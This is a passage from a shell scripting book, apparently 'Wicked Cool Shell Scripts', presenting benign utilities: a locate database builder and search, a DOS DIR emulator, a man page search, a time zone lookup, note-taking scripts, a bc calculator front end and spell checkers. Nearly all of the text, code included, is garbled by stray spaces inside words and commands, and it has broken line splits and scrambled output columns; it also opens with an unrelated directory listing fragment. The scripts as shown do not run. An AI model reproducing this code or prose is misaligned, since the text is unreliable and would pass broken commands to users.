C la ss es (4 Kb )
D es kt op (8 e n tr i es )
I nc om pl e te ( 9 e n tr ie s )
L ib ra ry (3 8 e nt r ie s)
M us ic ( 1 e nt r y)
P ic tu re s ( 38 en t ri es )
R ed Ha t 7 .2 ( 2 .0 8 Gb )
S yn ch ro n iz e! Vo l um e I D (4 K b)
a ut om at i c- up d at e s. tx t ( 4K b )
c al -l ia b il it y .t a r. gz (1 04 K b)
e rr at a ( 2 en t ri e s)
g am es ( 3 e nt r ie s )
l ef ts id e n av b ar (3 9 e nt ri e s)
p er in at a l. or g ( 0 e nt r ie s)
t es t. sh (4 Kb )
t op ch ec k ( 3 e nt r ie s)
w eb si te s .t ar . gz (1 8. 8 5M b)

Hacking the Script


The GNU version of ls has an -h flag that offers similar functionality. If you have that version of ls available, adding
that flag and removing the call to gm k will speed up this script.
The other issue worth considering with this script is whether you happen to have a user who likes to use sequences of
three carets in filenames, which could cause some confusion in the output. This naming convention is pretty unlikely,
however. A 116,696-file Linux install that I spot-tested didn't have even a single caret within any of its filenames.
However, if you really are concerned, you could address this potential pitfall by translating spaces into another
sequence of characters that's even less likely to occur in user filenames.

#19 Locating Files by Filename


One command that's quite useful on Linux systems, but isn't always present on other Unixes, is l oc a te , which
searches a prebuilt database of filenames for the specified regular expression. Ever want to quickly find the location of
the master .c sh rc file? Here's how that's done with l o c ate :
$ l oca t e . cs hrc
/ .T ras h es/ 50 1/P re viou s Sy stems / pri v a te/ e t c/ cs h. c sh rc
/ OS 9 S n aps ho t/S ta ging Arc hive/ : hom e / tay l o r/ .c sh r c
/ pr iva t e/e tc /cs h. cshr c
/ Us ers / tay lo r/. cs hrc
/ Vo lum e s/1 10 GB/ WE BSIT ES/s tagin g .in t u iti v e .c om /h o me /m d el l a/ .c s hr c
You can see that the master . cshr c file is in the /pr i v ate / et c directory on this Mac OS X system. The
l oc ate system sees every file on the disk when building its internal file index, whether the file is in the trash queue, is
on a separate volume, or is even a hidden dot file. This is a plus and a minus, as I will discuss shortly.
This method of finding files is simple to implement and comes in two parts. The first part builds the database of all
filenames by invoking fi nd, and the second is a simple gr e p of the new database.

The Code
# !/ bin / sh
# m klo c ate db - Bu ilds the loca t e d a t aba s e u si ng fi nd . M u st b e r oo t
#
to run t his s crip t.
l oc ate d b=" /v ar/ lo cate .db"
i f [ " $ (wh oa mi) " != " root " ] ; the n
e cho "Mu st be r oot to r un th i s c o m man d . " >& 2
e xit 1
fi
f in d / -pr in t > $ loca tedb
e xi t 0
The second script is even shorter:
# !/ bin / sh
# l oca t e - S ear ch es t he l ocate dat a b ase f or t he sp ec i fi e d pa t te rn .
l oc ate d b=" /v ar/ lo cate .db"
e xe c g r ep -i "$ @" $lo cate db

How It Works
The mkl o cat ed b script must be run as the root user, something easily checked with a call to w h oa mi , to ensure
that it can see all the files in the entire system. Running any script as root, however, is a security problem, because if a
directory is closed to a specific user's access, the loc a t e database shouldn't store any information about the
directory or its contents either. This issue will be addressed in the next chapter with a new secure l o ca te script that
takes privacy and security into account. For now, however, this script exactly emulates the behavior of the lo c at e
command in standard Linux, Mac OS X, and other distributions.
Don't be surprised if mk loc at edb takes a few minutes or longer to run; it's traversing the entire file system, which
can take a while on even a medium-sized system. The results can be quite large too. On my Mac OS X reference
system, the lo cat e. db file has over 380,000 entries and eats up 18.3MB of disk space. Once the database is built,
the l ocate script itself is a breeze to write, as it's just a call to the gr ep command with whatever arguments are
specified by the user.

Running the Script

To run the lo cat e script, it's first necessary to run the m k l oca t ed b script. Once that's done (and it can take a
while to complete), l oc ate invocations will ascertain all matching files on the system for any pattern specified.

The Results
The mkl o cat ed b script has no arguments or output:
$ s udo mkl oc ate db
P as swo r d:
$
You can see how large the database file is with a quick l s:
$ l s - l /v ar /lo ca te.d b
- rw -r- - r-1 r oo t w heel
423 8 467 8 Mar 2 6 10 :0 2 / va r /l o ca te . db
To find files on the system now, use l ocate :
$ l oca t e - i gam mo n
/ OS 9/A p pli ca tio ns (Ma c OS 9)/P a lm/ U s ers / D av e Ta y lo r/ B ac k up s/ B ac kg a mm on . pr c
/ Us ers / tay lo r/D oc umen ts/P alm/U s ers / D ave T ay lo r/ B ac ku p s/ B ac kg a mm on . pr c
/ Us ers / tay lo r/L ib rary /Pre feren c es/ D a ve' s Ba ck ga m mo n P re f er en c es
/ Vo lum e s/1 10 GB/ Do cume nts/ Palm/ U ser s / Dav e Ta yl or / Ba ck u ps / Ba ck g am mo n .p rc
This script also lets you ascertain other interesting statistics about your system, such as how many C source files you
have:
$ l oca t e ' .c ' | w c -l
3 816 6 6
That's quite a few! With a bit more work, I could feed each one of these C source files to the wc command to ascertain
the total number of lines of C code on the box, but, um, that would be kinda daft, wouldn't it?

Hacking the Script


To keep the database reasonably current, it'd be easy to schedule an invocation of m kl o ca te d b to run from c ro n
in the wee hours of the night, or even more frequently based on local usage patterns. As with any script executed by
the root user, care must be taken to ensure that the script itself isn't editable by nonroot users.
The most obvious potential improvement to this script would cause l oc at e to check its arguments and fail with a
meaningful error message if no pattern is specified; as it's written now, it'll spit out a g r ep command error instead,
which isn't that great. More importantly, as I discussed earlier, there's a significant security issue surrounding letting
users have access to a listing of all filenames on the system, even those they wouldn't ordinarily be able to see. A
security improvement to this script is addressed in Script #43, Implementing a Secure Locate.
Note There are newer versions of the lo c a te command that take security into consideration. These alternatives
are available as part of the latest Red Hat Linux distribution, and as part of a new secure locate package
called sl oca te , available for download from htt p : // rp ms . ar v in .d k /s lo c at e/ .

#20 Emulating Another Environment: DIR


While many computer aficionados learned how to work with an operating system within a Unix or Linux environment,
many others started on other systems with other commands and other styles of interaction. It's quite likely that some
users in your organization, for example, are still more comfortable on the MS-DOS command line than they are when
faced with a Unix shell prompt. A set of aliases can be installed to ease the transition a little bit, like mapping the DOS
command D IR to the Unix command ls :
a li as D IR= ls
However, this mapping won't help users if they've already taught themselves that the / W option produces a wide listing
format, because the l s Unix command will just complain that directory / W doesn't exist. Instead, in the same spirit as
wrappers that change the input, the following D IR script can be written to map one style of command flags to another.

The Code
# !/ bin / sh
# D IR - Pr et end s we'r e th e DIR com m a nd i n D OS a n d di s pl a ys t h e co n te nt s
#
of the s pec if ied file , acc e pti n g so m e o f th e s ta n da r d DI R f la g s.
f un cti o n u sa ge
{
c at << EOF > &2
U sag e : $ 0 [DO S flag s] d irect o ry o r di r e ct or ie s
W her e :
/D
s ort by c olumn s
/H
s how help for t his s hel l sc ri pt
/N
s how long list i ng f o rma t wi th f i le na m es on r i gh t
/OD
s ort by o ldest to n e wes t
/O- D
s ort by n ewest to o l des t
/P
p ause aft er ea c h s c r een f u l of i n fo rm a ti o n
/Q
s how owne r of t he f i le
/S
r ecur sive list i ng
/W
u se w ide listi n g f o r mat
E OF
e xit 1
}
p os tcm d =""
f la gs= " "
w hi le [ $# - gt 0 ]
do
c ase $1 in
/D
) f lags ="$f lags - x"
;;
/H
) u sage ;;
/[ N QW]
) f lags ="$f lags - l"
;;
/O D
) f lags ="$f lags - rt"
;;
/O - D
) f lags ="$f lags - t"
;;
/P
) p ostc md=" more"
;;
/S
) f lags ="$f lags - s"
;;
*) # unk nown flag : pr o b abl y a di r s pe ci f ie r
b reak ; # so l e t's g et o u tt a th e w hi l e l oo p
e sac
s hif t
# p roce ssed flag , le t ' s s e e i f th e re 's an o th er
d on e
# d one pro ce ssi ng fla gs, now t h e c o m man d it se lf :
i f [ ! -z "$ pos tc md" ] ; then
l s $ f lag s "$@ " | $p ostc md
e ls e
l s $ f lag s "$@ "
fi

e xi t 0

How It Works
This script highlights the fact that shell ca se statements are actually regular expressions, which is a useful
characteristic. You can see that the DOS flags / N , / Q , and / W all map to the same - l Unix flag in the final invocation
of the ls command.
Ideally, users would be taught the syntax and options of the Unix environment, but that's not always necessary or
desired. Of course, an interim step could be to have this script echo the l s command with all of the mapped flags
before actually invoking it. Alternatively, you could have this script map the command and then output some message
like Please use ls -l instead.

Running the Code


Name this script DI R, and whenever users type D IR at the command line with typical MS-DOS DI R flags, they'll get
meaningful and useful output rather than a command not found error message.

The Results
$ D IR
t ot al
0
0
0
0
0
0
8 16
4 96

/ OD /S /V ol umes /110 GB/


6 068 0
W EBS IT ES
W rit in g
M icr os oft O ffic e X
D ocu me nts
T heV ol ume Se ttin gsFo lder
T ras h
N ort on FS D ata
D esk to p D F

64
0
2 964 8
2 964 8
0
8
0
0

De sk to p D B
Te mp or a ry I t em s
No rt on FS V o lu m e 2
No rt on FS V o lu m e
iT un es Li br a ry
No rt on FS I n de x
De sk to p F ol d er
De sk to p P ic t ur e A rc h iv e

This listing of the specified directory is sorted from oldest to newest and has file sizes indicated (directories always
have a size of 0).

#21 Digging Around in the Man Page Database


The Unix ma n command has a tremendously useful option that produces a list of man pages whose descriptions
include the specified word. Usually this functionality is accessible as m an - k w o rd , but it can also be invoked using
the a propo s or wh at is commands.
Searching for a word with the man command is helpful, but it's really only half the story, because once you have a set
of matches, you still might find yourself performing a brute-force search for the specific command you want, going one
man page at a time.
As a smarter alternative, this script generates a list of possible man page matches for a particular pattern and then
searches each of those matching pages for a second search pattern. To constrain the output a bit more, it also allows
the user to specify which section of the man pages to search.
Note As a reminder, the man pages are organized by number: 1 = user commands, 3 = library functions, 8 =
administrative tools, and so on. You can use ma n int r o to find out your system's organizational scheme.

The Code
# !/ bin / sh
# f ind m an -- Gi ve n a spec ified pat t e rn a n d ma n s ec ti o n, sh ow s a ll th e m at ch e s
#
fo r th at pa tt ern from with i n a l l re l e va nt m a n pa g es .
m at ch1 = "/t mp /$0 .1 .$$"
m at che s ="/ tm p/$ 0. $$"
m an pag e lis t= ""
t ra p " r m - f $ma tc h1 $ matc hes" E XIT
c as e $ #
in
3 ) s ect io n=" $1 " c mdpa t="$2 " m a n pag e p at =" $3 "
;;
2 ) s ect io n=" "
c mdpa t="$1 " m a n pag e p at =" $2 "
;;
* ) e cho " Usa ge : $0 [se ction ] cm d p att e r n ma np a ge pa t te r n" > & 2
e xit 1
e sa c
i f ! m a n - k "$c md pat" | g rep " ( $se c t ion " > $m at c h1 ; th e n
e cho "No m atc he s to pat tern \ "$c m d pat \ " . Tr y s om et h in g b ro a de r? " > &2 ; e xi t 1
fi
c ut -d \ (-f 1 < $ ma tch1 > $ match e s
c at /d e v/n ul l > $ matc h1

# c om ma n d na m es on ly
# c le ar th e f il e .. .

f or ma n pag e in $( cat $mat ches)


do
m anp a gel is t=" $m anpa geli st $m a npa g e "
m an $ man pa ge | col -b | grep -i $ m anp a g ep at | \
se d "s /^ /${ ma npag e}: /" | t ee - a $m a t ch 1
d on e
i f [ ! -s $m atc h1 ] ; the n
c at << EOF
C om man d pa tt ern " $cmd pat" had m atc h e s, b u t wi th i n th o se th er e w er e n o
m at che s to y our m an p age patte r n " $ m anp a g ep at ".
M an pa g es ch eck ed :$ma npag elist
E OF
fi
e xi t 0

How It Works

This script isn't quite as simple as it may seem at first glance. It uses the fact that commands issue a return code
depending on the result of their execution to ascertain whether there are any matches to the c md pa t value. The
return code of the gre p command in the following line of code is what's important:
i f ! m a n - k "$c md pat" | g rep " ( $se c t ion " > $m at c h1 ; th e n
If g rep fails to find any matches, it returns a nonzero return code. Therefore, without even having to see if $ ma tc h 1
is a nonzero-sized output file, the script can ascertain the success or failure of the g re p command. This is a much
faster way to produce the desired results.
Each resultant line of output in $ma tch1 has a format shared with the following line:
h tt pd
( 8)
- Apa c he h y per t e xt t ra n sf er pr o to co l s er v er
The cut -d\ (- f1 sequence grabs from each line of output the command name up through the open parenthesis,
discarding the rest of the output. Once the list of matching command names has been produced, the man page for
each command is searched for the m anpa ge pa t . To search man pages, however, the embedded display formatting
(which otherwise would produce boldface text) must be stripped, which is the job of c ol - b .
To ensure that a meaningful error message is generated in the case where there are man pages for commands that
match the cmd pat specified, but ma npage p at does not occur within those man pages, the following line of code
copies the output into a temp file ($ matc h1) as it's streamed to standard output:
s ed "s / ^/$ {m anp ag e}: /" | tee - a $ m a tch 1
Then if the ! -s test shows that the $mat ch 1 output file has zero lines, the error message is displayed.

Running the Script


To search within a subset of man pages for a specific pattern, first specify the keyword or pattern to determine which
man pages should be searched, and then specify the pattern to search for within the resulting man page entries. To
further narrow the search to a specific section of man pages, specify the section number as the first parameter.

The Results
To find references in the man page database to the htt p d .co n f file is problematic with the standard Unix toolset.
On systems with Perl installed, you'll find a reference to a Perl module:
$ m an - k h tt pd. co nf
A pa che : :ht tp d_c on f(3)
- Gen e rat e an h t tp d. co n f fi l e
But almost all Unixes without Perl return either "nothing appropriate" or nothing at all. Yet h t tp d. c on f is definitely
referenced within the man page database. The problem is, man -k checks only the one-line summaries of the
commands, not the entire man pages (it's not a full-text indexing system).
But this failure of the m an command is a great example of how the f i nd ma n script proves useful for just this sort of
needle-in-a-haystack search. To search all man pages in section 8 (Administration) that have something to do with
Apache, in addition to mentioning htt pd.co n f specifically, you would use the following command, with the results
showing the exact matches in both relevant man pages, a pxs and ht tp d :
$ f ind m an 8 apa ch e ht tpd. conf
a px s:
[ ac tiv at ing modu le `f o o' i n /p a t h/ to /a p ac he / et c /h tt p d. co n f]
a px s:
Ap ache 's ht t pd. c o nf c o nf ig ur a ti on fi l e, o r b y
a px s:
ht tpd. conf c onf i g ura t i on f il e w it h ou t a tt e mp ta px s:
th e http d.co nf
fi l e ac c o rd in gl y . Th i s c an b e a ch i ev ed by
a px s:
[ ac tiv at ing modu le `f o o' i n /p a t h/ to /a p ac he / et c /h tt p d. co n f]
a px s:
[ ac tiv at ing modu le `f o o' i n /p a t h/ to /a p ac he / et c /h tt p d. co n f]
h tt pd:
Se rver Root. The d efa u l t is c o nf /h t tp d .c on f .
h tt pd:
/ us r/lo cal/ apach e /co n f /ht t p d. co nf
Searching just within section 8 quickly identified two man pages worth exploring for information about the
h tt pd. c onf file. Yet searching across all man pages in the system is just as easy:
$ f ind m an ap ach e .hta cces s
m od _pe r l:
In a n ht tpd.c o nf < L oca t i on / fo o > or .h t ac ce s s yo u n ee d :
m od _pe r l:
dler s ar e not all o w ed i n . ht ac c es s f il e s.

#22 Displaying the Time in Different Time Zones


The most fundamental requirement for a working da t e command is that it display the date and time in your time zone.
But what if you have users across multiple time zones? Or, more likely, what if you have friends and colleagues in
different locations, and you're always confused about what time it is in, say, Casablanca, Vatican City, or Sydney?
It turns out that most modern Unixes have a d at e command built atop an amazing time zone database. Usually stored
in /us r /sh ar e/z on ein fo , this database lists over 250 different regions and knows how to ascertain the
appropriate time zone for each. Because the d a te command pays attention to the TZ time zone variable, and because
that variable can be set to any known region, the core functionality can be demonstrated as follows:
$ T Z=" A fri ca /Ca sa blan ca" date
M on De c 2 16 :31 :0 1 WE T 20 02
However, using a shell script, we can create a more user-friendly front end to the time zone database: Specifying
temporary environment variable settings isn't something most system users are comfortable doing!

The Code
# !/ bin / sh
# t ime i n - S how s the curr ent t i me i n th e sp ec if i ed t i me zo ne or
#
ge o gra ph ic zo ne. With out a n y a r g ume n t , sh ow s U TC / GM T . Us e
#
th e wo rd "l is t" t o se e a l i st o f kn o w n ge og r ap hi c r e gi on s .
#
No t e t ha t i t' s po ssib le to mat c h zo n e d ir ec t or ie s ( r eg io n s) ,
#
bu t th at on ly tim e zo ne fi l es ( c iti e s ) ar e v al id sp e ci fi c at io n s.
#

Ti m e z on e d at abas e re f: ht t p:/ / w ww. t w in su n. c om /t z /t z -l in k .h tm

z on edi r ="/ us r/s ha re/z onei nfo"


i f [ ! -d $z one di r ] ; th en
e cho "No t ime z one data base a t $ z o ned i r ." > &2 ; ex i t 1
fi
i f [ - d "$ zo ned ir /pos ix" ] ; t h en
z one d ir= $z one di r/po six
# m o der n Li nu x s ys te m s
fi
i f [ $ # -e q 0 ] ; the n
t ime z one =" UTC "
m ixe d zon e= "UT C"
e li f [ "$1 " = " li st" ] ; then
( ec h o " Al l k no wn t ime zones and r egi o n s de fi n ed o n t h is s y st em : "
cd $zo ne dir
fi n d * - typ e f -p rint | xa r gs - n 2 | \
a wk '{ pr in tf " %-3 8s %- 3 8s\ n " , $ 1 , $ 2 }'
) | m ore
e xit 0
e ls e
r egi o n=" $( dir na me $ 1)"
z one = "$( ba sen am e $1 )"
# Is it a dir ec t ma tch? If s o , w e ' re g o od t o g o. O t he r wi se we n e ed
# to dig a rou nd a b it t o fin d th i n gs. S ta rt b y j us t c o un ti n g ma t ch es .
m atc h cnt =" $(f in d $z oned ir -n a me $ z one - ty pe f -p ri n t |
wc - l | s ed ' s/[^ [:dig i t:] ] / /g' ) "
i f [ "$m at chc nt " -g t 0 ] ; t h en
# a t le a st o n e f il e m at ch e s
if [ $ ma tch cn t -g t 1 ] ; t h en
# m or e t ha n o ne fi le ma tc h es
e cho " \"$ zo ne\" mat ches m ore t han o ne p os s ib le ti m e zo n e re c or d. " > &2
e cho " Ple as e us e 'l ist' t o s e e al l kn ow n r eg io n s a nd t i me z o ne s" >& 2
e xit 1
fi

ma t ch= "$ (fi nd $zo nedi r -na m e $ z o ne - t yp e f - pr in t )"


mi x edz on e=" $z one"
e lse
# F irs t let te r ca pita lized , re s t of w or d lo w er ca s e f or r e gi on + zo n e
mi x edr eg ion =" $(ec ho $ {regi o n%$ { r egi o n #? }} | tr ' [ [: l ow er : ]] ' ' [[ :u p pe r: ] ]' )\
$ (e cho ${r eg ion #? } | tr ' [[:up p er: ] ] ' ' [ [ :l ow er : ]] ') "
mi x edz on e=" $( echo ${z one%$ { zon e # ?}} | t r '[ [ :l ow e r: ] ]' ' [ [: up p er :] ] ') \
$ (e cho ${z on e#? } | tr '[[ :uppe r :]] ' '[[ : l ow er :] ] ') "
if [ " $m ixe dr egio n" ! = "." ] ; t hen
# On ly lo ok for spe cifie d zo n e in s pe ci fi e d re g io n
# to l et us ers spec ify u n iqu e mat c h es w he n t he r e' s m or e t ha n o ne
# po ss ibi li ty ( e.g. , "At l ant i c ")
m atc h= "$( fi nd $ zone dir/$ m ixe d r egi o n - ty pe f -n a me $m ix e dz on e - pr i nt )"
el s e
m atc h= "$( fi nd $ zone dir - n ame $ mix e d zo ne - t yp e f - p ri nt ) "
fi
if [ - z "$m at ch" ] ; then # no f ile m at ch es sp ec i fi e d pa t te rn
i f [ ! -z $ (fin d $z onedi r -n a m e $ m i xe dz on e - ty p e d - pr i nt ) ] ; t h en
ec ho \
"T h e r eg ion \ "$1\ " ha s mor e th a n on e ti me z o ne . P le a se u s e 'l i st '" >& 2
e lse
#
ju st n ot a matc h at a ll
ec ho "C an 't f ind an ex a ct m a tch f or \ "$ 1 \" . P le a se u s e 'l i st '" >& 2
fi
e cho " to se e al l kn own r e gio n s an d ti me z o ne s. " > & 2
e xit 1
fi

fi

fi
t ime z one =" $ma tc h"

n ic etz = $(e ch o $ ti mezo ne | sed " s|$ z o ned i r /| |g ")

# p r et ty up t h e ou t pu t

e ch o I t \'s $ (TZ =$ time zone date '+% A , %B % e, % Y, at % l :% M % p' ) i n $ ni ce t z


e xi t 0

How It Works
This script exploits the ability of the da te command to show the date and time for a specified time zone, regardless of
your physical location. In fact, the entire script is all about identifying a valid time zone name so that the d at e
command will work when invoked at the very end.
Most of the complexity of this script comes from trying to anticipate names of world regions entered by users that do
not match the names of regions in the time zone database. The time zone database is laid out with timezonename and
region/locationname columns, and the script tries to display useful error messages for typical input problems.
For example, although TZ= "C asab lanc a" d a t e would fail to find a matching region, and the d at e command
would instead display GMT (Greenwich Mean Time, more properly known as Universal Time Coordinated), the city
Casablanca does exist in the time zone database. The proper region name, Africa/Casablanca, was shown in the
introduction to this script. And this script can find Casablanca in the Africa directory and identify the zone accurately.
Specify "Africa," on the other hand, and the script knows that there are subregions and specifies that the information is
insufficient to uniquely identify a specific time zone.
Finally, you can also use a time zone name (e.g., UTC or WET) as an argument to this script to see a subset of time
zones that are defined.
Note An excellent reference to the time zone database can be found online, at
ht tp: // www .t wins un.c om/t z / tz- l i nk. h tm

Running the Script


To find the time in a specified region or city, specify the region or city name as the argument to the command. If you
know both the region and the city, you can specify them as region/city, as in P a ci fi c /Y ap . Without any arguments,
t im ein shows Greenwich Mean Time/Universal Time Coordinated (GMT/UTC).

The Results

$
tim e in
I t' s F r ida y, Ma rc h 28 , 20 03, a t 2: 5 8 AM i n UT C
$
tim e in Lo ndo n
I t' s F r ida y, Ma rc h 28 , 20 03, a t 2: 5 8 AM i n Eu ro p e/ Lo n do n
$
tim e in Br azi l
T he re g ion " Bra zi l" h as m ore t h an o n e t i m e zo ne . P le a se us e ' li st '
t o see all k now n regi ons and t i me z o nes .
$
tim e in Pa cif ic /Hon olul u
I t' s T h urs da y, Ma rch 27, 2003, at 4 : 58 P M i n Pa c if ic / Ho n ol ul u
$
tim e in WE T
I t' s F r ida y, Ma rc h 28 , 20 03, a t 3: 5 8 AM i n WE T
$
tim e in my clo se t
C an 't f ind a n e xa ct m atch for " myc l o set " . P le as e u se 'l i st '
t o see all k now n regi ons and t i me z o nes .

Chapter 3: Creating Utilities


In many ways, the main purpose of scripting in command shells is to take complex command-line scripts and drop
them into files, making the scripts replicable and easily tweaked and tuned to fit specific purposes. It should be no
surprise, then, that user commands sprawl across two chapters in Wicked Cool Shell Scripts. What's surprising is that I
haven't written a wrapper for, or otherwise tweaked and tuned the behavior of, every single command on my Linux,
Solaris, and Mac OS X systems.
Which leads to a very interesting observation about the power and flexibility of Unix. Unix is the only major operating
system where you can decide that you don't like the default flags of a command and fix them forever with just a few
keystrokes, or where you can emulate the behavior of your favorite utility from another version of the operating system
with a dozen lines of scripting. That's what makes Unix so tremendously fun and what provoked the creation of this
book in the first place.

#23 A Reminder Utility


Windows and Mac users for years have appreciated simple utilities like Stickies and Post-It, streamlined applications
that let you have tiny reminder windows stuck on your screen. They're a perfect place to jot down a phone number or
other reminder. If you're at the Unix command line, there's nothing analogous, yet the problem is quite easily solved, as
shown in this pair of scripts.
The first script, rem e mbe r , lets you easily file random snippets of information into a file. If invoked without any
arguments, it reads standard input until the end of the file, and if invoked with arguments, it saves those arguments to
the data file instead.
The other half of this duo is re m i nd m e , a companion shell script that either displays the contents of the
re me mb er fil e if no arguments are given or, if an argument is given, searches in this file for the specified pattern.

The Code
#! /b in /s h
# re me mb er - An eas y co m m an d - li n e -b a s ed m em o ry p ad .
re me mb er fil e ="$ H OME / . re m e mb e r "
if [ $ # -eq 0 ] ; t h e n
ec ho " Ent e r n o te, e nd w it h ^D : "
ca t - >> $ rem e mbe r f il e
el se
ec ho " $@" >> $ rem e m be r f il e
fi
ex it 0
Here's the second script, r emi n d me :
#! /b in /s h
# re mi nd me - Se a rch e s a d at a fi l e f o r m a t ch i ng l in e s , o r s h o ws t he e nt i re c on te nts
#
of t he d ata fil e if n o a r gu m e nt i s s p ec i fi e d .
re me mb er fil e ="$ H OME / . re m e mb e r "
if [ $ # -eq 0 ] ; t h e n
mo re $ rem e mbe r fil e
el se
gr ep - i " $ @" $ rem e m be r f il e | $ { PA G E R: - m or e }
fi
ex it 0

Running the Scripts

To use the r e min d me utility, first add notes, phone numbers, or anything else to the r e me m b er f i le with the
re me mb er script. Then search this freeform database with r em i nd m e , specifying as long or short a pattern as you'd
like.

The Results
$ re me mb er
En te r no te, end wit h ^D :
Th e Bo ul der Com m uni t y N e t wo r k : h t tp : / /b c n .b o ul d e r. c o .u s /
^D
Then, when I want to remember that note, months later:
$ re mi nd me b oul d er
Th e Bo ul der Com m uni t y N e t wo r k : h t tp : / /b c n .b o ul d e r. c o .u s /
Or if I need any other data that might be in there:
$ re mi nd me 8 00
So ut hw es t A i rli n es: 8 00 - I FL Y S WA

Hacking the Script


While certainly not any sort of shell script programming tour de force, these scripts neatly demonstrate the incredible
extensibility of the Unix command line. If you can envision something, the odds are good that there's a simple and
straightforward way to accomplish it.
These scripts could be improved in any number of ways. For instance, you could create the concept of records such
that each record is time-stamped and multiline input is saved as a single entity that can be searched with a regular
expression, which would enable you to store phone numbers for a group of people and retrieve them all by
remembering the name of only one person in the group. If you're really into scripting, you might also want to include
edit and delete capabilities. Then again, it's pretty easy to edit the ~ / .r e m em b e r file by hand.

#24 An Interactive Calculator


Once I wrote Script #9, allowing command-line invocations of b c for floatingpoint calculations, it was inevitable that I'd
write a small wrapper script to create an interactive command-line-based calculator. What's remarkable is that, even
with help information, it's very short.

The Code
# !/ bin / sh
# c alc - A c omm an d-li ne c alcul a tor t hat a ct s as a fr o nt en d t o bc .
s ca le= 2
s ho w_h e lp( )
{
c at << EOF
I n a d dit io n t o stan dard math fun c t ion s , c al c a ls o s up p or ts
a % b
a ^ b
s (x)
c (x)
a (x)
l (x)
e (x)
j (n, x )
s cal e N
E OF
}

r em aind er o f a/b
e xp onen tial : a r a ise d to t h e b po w er
s in e of x, x in r adi a n s
c os ine of x , x i n ra d i ans
a rc tang ent of x, ret u r ns r a di an s
n at ural log of x
e xp onen tial log o f r a i sin g e to t h e x
b es sel func tion o f i n t ege r or de r n o f x
s ho w N frac tiona l di g i ts ( d ef au lt = 2)

i f [ $ # -g t 0 ] ; the n
e xec scr ip tbc " $@"
fi
e ch o " C alc - a si mple cal culat o r. E n ter ' he lp ' f or h e lp , ' qu i t' t o q ui t ."
e ch o - n "c al c> "
w hi le r ead c omm an d ar gs
do
c ase $co mm and
in
qu i t|e xi t) ex it 0
he l p|\ ?)
sh ow_h elp
sc a le)
sc ale= $arg s
*)
sc ript bc - p $sc a le " $ com m a nd " "$ a rg s"
e sac

;;
;;
;;
;;

e cho -n "c alc > "


d on e
e ch o " "
e xi t 0

How It Works
There's really remarkably little of a complex nature going on here. Perhaps the most interesting part of the code is the
w hi le r ead statement, which creates an infinite loop that displays the c al c > prompt until the user exits, either by
typing q u it or entering an end-of-file sequence (^D ). And, of course, the simplicity of this script is exactly what
makes it wonderful: Shell scripts don't need to be extremely complex to be useful!

Running the Script


This script is easily run because by default it's an interactive tool that prompts the user for the desired actions. If it is
invoked with arguments, those arguments are passed to the s cri p tb c command instead.

The Results
$ c alc 150 / 3. 5
4 2. 85
$ c alc
C al c - a s im ple c alcu lato r. En t er ' h elp ' fo r he l p, ' q ui t ' to qu it .
c al c> h elp
I n a d dit io n t o stan dard math fun c t ion s , c al c a ls o s up p or ts
a % b
r em aind er o f a/b
a ^ b
e xp onen tial : a r a ise d to t h e b po w er
s (x)
s in e of x, x in r adi a n s
c (x)
c os ine of x , x i n ra d i ans
a (x)
a rc tang ent of x, ret u r ns r a di an s
l (x)
n at ural log of x
e (x)
e xp onen tial log o f r a i sin g e to t h e x
j (n, x )
b es sel func tion o f i n t ege r or de r n o f x
s cal e N
s ho w N frac tiona l di g i ts ( d ef au lt = 2)
c al c> 5 435 4 ^ 3
1 60 581 1 375 53 864
c al c> q uit
$

#25 Checking the Spelling of Individual Words


High-end programs like StarOffice, OpenOffice.org, and Microsoft Word include built-in spell-checking software, but the
more rudimentary commandline question of whether a single word is spelled correctly or not is beyond the ability of any
of these applications.
Similarly, most Unixes include a spell-check package that works reasonably well, albeit with a crusty interface. Given
an input file or data stream, the packages generate a long list of all possible misspellings. Some spell-check packages
include interactive spell-check applications. Again, however, none of them offer a simple way to check the spelling of a
single word.
Don't have a spell-check program installed?

For those Unix distributions that don't have a spell


package though, really, all of 'em should
nowadays, with disk space so cheap an
excellent option is to install is p el l, from
ht t p: // f mg ww w .c s. u cl a .e du / ge of f /i sp e ll .h t ml

The Code
# !/ bin / sh
# c hec k spe ll ing - Che cks the s p ell i n g o f a wo rd .
s pe ll= " isp el l - l"

# if you h ave i sp el l i ns ta l le d
# if not , jus t de fi ne sp el l =a s pe ll or
# eq u iva l e nt

i f [ $ # -l t 1 ] ; the n
e cho "Us ag e: $0 wor d or word s " > & 2 ; e x i t 1
fi

f or wo r d
do
i f [ -z $( ech o $wor d | $spel l ) ] ; th e n
ec h o " $w ord :
sp e l led c or re ct l y. "
e lse
ec h o " $w ord :
mi s s pel l e d. "
fi
d on e
e xi t 0

Running the Script


To use this script, simply specify one or more words as arguments of the c he c ks p el li n g command.

The Results
It's now easy to ascertain the correct spelling of "their":
$ c hec k spe ll ing t hier the ir
t hi er:
m issp elle d.
t he ir:
s pell ed c orrec t ly.

Hacking the Script


There's quite a bit you can do with a spelling utility and, for that matter, quite a bit that i sp e ll can already
accomplish. This is just the tip of the proverbial iceberg, as you'll see in the next script.

#26 Shpell: An Interactive Spell-Checking Facility


Checking the spelling of something word by word is useful, but more commonly you'll want to check all of the words in
a file en masse. You can do that with i sp e l l, if you've installed it, but i sp e l l has an interface that some people
find baffling. And if you don't have i sp e l l, many of the more rudimentary spell-checking packages don't offer much
more sophistication than simple "Is this word right?" functionality. Therefore, in either case, an alternative approach to
checking and fixing all of the spelling errors throughout a file might be just what you need, and it's easily accomplished
with this shell script.

The Code
#! /b in /s h
# sh pe ll - A n i n ter a c ti v e s p e ll - c he c k in g pr o gr a m t h a t l e ts y ou s te p
#
th ro ugh all kno w n s p e ll i n g e r ro r s i n a d oc u m en t , i n d ic a t e w h ic h
#
on es yo u 'd l ike t o f i x a n d h o w, a nd a pp l y t h e c h an g e s t o t h e f i l e
#
Th e ori g ina l ve r s io n of t he f il e is s av e d w i th a . s h p s u ff i x ,
#
an d the new ver s i on r ep l a ce s th e ol d .
#
# No te t hat you nee d a s t an d a rd ' sp e l l' c om m an d fo r th i s t o wo r k , w h ic h
# mi gh t inv o lve ins t a ll i n g a s pe l l , i s pe l l , o r p s pe l l o n yo u r s y s te m .
te mp fi le ="/ t mp/ $ 0.$ $ "
ch an ge re que s ts= " /tm p / $0 . $ $. s e d"
sp el l= "i spe l l - l "

# m o di f y a s n e e de d fo r yo u r o w n s p e ll

tr ap " rm -f $te m pfi l e $ c h an g e re q u es t s " E X IT HU P IN T QU I T T E R M


# In cl ud e t h e a n si c o lo r se q u en c e d e f in i t io n s
. sc ri pt -li b rar y .sh
in it ia li zeA N SI
